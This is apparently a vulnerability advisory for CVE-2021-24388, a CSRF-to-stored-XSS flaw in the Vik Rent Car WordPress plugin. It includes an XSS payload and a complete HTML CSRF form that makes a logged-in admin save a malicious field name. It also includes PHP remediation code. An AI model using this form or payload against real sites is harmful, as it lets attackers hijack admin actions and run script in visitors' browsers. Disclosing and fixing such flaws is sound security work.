
WordPress Plugin Vulnerabilities

Vik Rent Car < 1.1.7 - CSRF to Stored XSS

Description

The plugin has a custom field option through which the administrator manages the fields a customer must fill in before saving an order. The field name is not sanitised on input or escaped before being output back into the page, leading to a stored Cross-Site Scripting issue. There is also no CSRF check before the setting is saved, so an attacker can make a logged-in admin set arbitrary Custom Fields, including one carrying an XSS payload.

Note: The XSS was fixed in 1.1.6 and the CSRF in 1.1.7.

Proof of Concept

Steps to reproduce the bug:

1. Go to the custom fields option in the plugin (/wp-admin/admin.php?option=com_vikrentcar&task=customf)
2. Edit a field and put an XSS payload in the Field Name, e.g. <img src=x onerror=alert(1337)>
3. Save it; the XSS triggers whenever anyone visits a page that renders the field

Via CSRF:

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php" method="POST">
      <input type="hidden" name="name" value="ORDER_TERMSCONDITIONS<img src onerror=alert(/XSS/)>" />
      <input type="hidden" name="type" value="checkbox" />
      <input type="hidden" name="choose[]" value="" />
      <input type="hidden" name="required" value="1" />
      <input type="hidden" name="flag" value="" />
      <input type="hidden" name="poplink" value="" />
      <input type="hidden" name="task" value="updatecustomf" />
      <input type="hidden" name="option" value="com_vikrentcar" />
      <input type="hidden" name="where" value="13" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
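The two fixes the advisory describes (a nonce check on save, and sanitising/escaping the field name) look like this in a WordPress settings handler. This is an added example written here, not the Vik Rent Car plugin's own code; the function names, the nonce action `example_update_customf`, the option key `example_custom_field` and the capability used are assumptions.

```php
<?php
// Added example, not the plugin's code. Names below are hypothetical.

// Output side: the form carries a nonce that a cross-site POST cannot forge,
// and the stored name is escaped for an attribute context before echoing.
function example_render_custom_field_form( $field_name ) {
    echo '<form method="post" action="' . esc_url( admin_url( 'admin-post.php' ) ) . '">';
    wp_nonce_field( 'example_update_customf' ); // emits _wpnonce and _wp_http_referer
    // esc_attr() encodes quotes and angle brackets, so a stored
    // "<img src onerror=...>" is rendered as text rather than markup.
    echo '<input type="text" name="name" value="' . esc_attr( $field_name ) . '">';
    echo '<input type="hidden" name="action" value="example_update_customf">';
    echo '<button type="submit">Save</button></form>';
}

// Save side: capability check, then nonce check (CSRF), then input sanitisation.
function example_update_custom_field() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges', '', array( 'response' => 403 ) );
    }
    // Dies with 403 when _wpnonce is missing or not valid for this action;
    // this is the check the advisory says was absent before 1.1.7.
    check_admin_referer( 'example_update_customf' );

    // sanitize_text_field() strips tags and control characters, so the
    // stored value cannot carry markup (the input-side part of the 1.1.6 fix).
    $name     = sanitize_text_field( wp_unslash( $_POST['name'] ?? '' ) );
    $type     = $_POST['type'] ?? 'text';
    $type     = in_array( $type, array( 'text', 'checkbox' ), true ) ? $type : 'text';
    $required = isset( $_POST['required'] ) ? 1 : 0;

    update_option( 'example_custom_field', array(
        'name'     => $name,
        'type'     => $type,
        'required' => $required,
    ) );
    wp_safe_redirect( admin_url( 'admin.php?page=example_customf&updated=1' ) );
    exit;
}
add_action( 'admin_post_example_update_customf', 'example_update_custom_field' );

// Front-end display of the stored name: escape at output as well, so a value
// written by older, unsanitised code is still rendered inert.
function example_print_custom_field_label() {
    $field = get_option( 'example_custom_field', array( 'name' => '' ) );
    echo '<label>' . esc_html( $field['name'] ) . '</label>';
}
```

Escaping at output (esc_html/esc_attr) is the control that actually prevents the stored XSS; sanitising on input is defence in depth, and the nonce check alone would not have stopped an admin who pastes the payload themselves.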

Affects Plugins

vikrentcar
Fixed in version 1.1.7

References

CVE
CVE-2021-24388

Classification

Type

CSRF

OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352

Miscellaneous

Original Researcher

Satyender Yadav

Submitter

Satyender Yadav

Verified

Yes

WPVDB ID
e3f6576f-08cb-4278-8c79-3ef4d0b85cd9

Timeline

Publicly Published

2021-06-14

Added

2021-06-14

Last Updated

2021-06-25
